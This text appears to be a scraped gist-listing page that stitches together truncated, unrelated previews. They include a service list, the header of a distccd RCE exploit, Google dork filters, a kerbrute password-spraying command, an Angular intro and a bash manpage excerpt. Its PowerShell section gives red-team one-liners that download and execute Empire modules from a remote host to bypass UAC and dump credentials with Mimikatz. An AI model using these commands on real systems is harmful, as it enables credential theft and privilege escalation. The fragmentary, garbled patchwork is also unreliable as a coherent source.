List1 | list2 | list3 | list4 | list5 |
---|---|---|---|---|
asterisk | icq | oracle-listener | rexec | snmp |
cisco | imap[s] | oracle-sid | rlogin | socks5 |
cisco-enable | irc | pcanywhere | rpcap | ssh |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# -*- coding: utf-8 -*- | |
''' | |
distccd v1 RCE (CVE-2004-2687) | |
This exploit is ported from a public Metasploit exploit code : | |
https://www.exploit-db.com/exploits/9915 | |
The goal of that script is to avoid using Metasploit and to do it manually. (OSCP style) |
Filter | Description | Example |
---|---|---|
allintext | Searches for occurrences of all the keywords given. | allintext:"keyword" |
intext | Searches for the occurrences of keywords all at once or one at a time. | intext:"keyword" |
inurl | Searches for a URL matching one of the keywords. | inurl:"keyword" |
allinurl | Searches for a URL matching all the keywords in the query. | allinurl:"keyword" |
intitle | Searches for occurrences of keywords in title all or one. | intitle:"keyword" |
With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With Rubeus version with brute module:
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Description: | |
# Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing. | |
# Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command] | |
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'" | |
# Invoke-Mimikatz: Dump credentials from memory | |
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds" | |
# Import Mimikatz Module to run further commands |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
index.html | |
robots.txt | |
favicon.ico | |
Makefile | |
.gitignore | |
404.html | |
index.js | |
README.md | |
500.html | |
422.html |
QUICKSTART INTRO
Le applicazioni Angular2 sono sviluppate sul concetto di "componenti" che sono una combinazione di un template HTML ed una classe dedicata al componente. Un componente controlla una porzione della pagina.
Di seguito un esempio di implementazione di un componente:
import { Component } from '@angular/core';
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
The following paragraphs describe how bash executes | |
its startup files. If any of the files exist but | |
cannot be read, bash reports an error. Tildes are | |
expanded in file names as described below under | |
Tilde Expansion in the EXPANSION section. | |
When bash is invoked as an interactive login shell, | |
or as a non-interactive shell with the --login | |
option, it first reads and executes commands from |
NewerOlder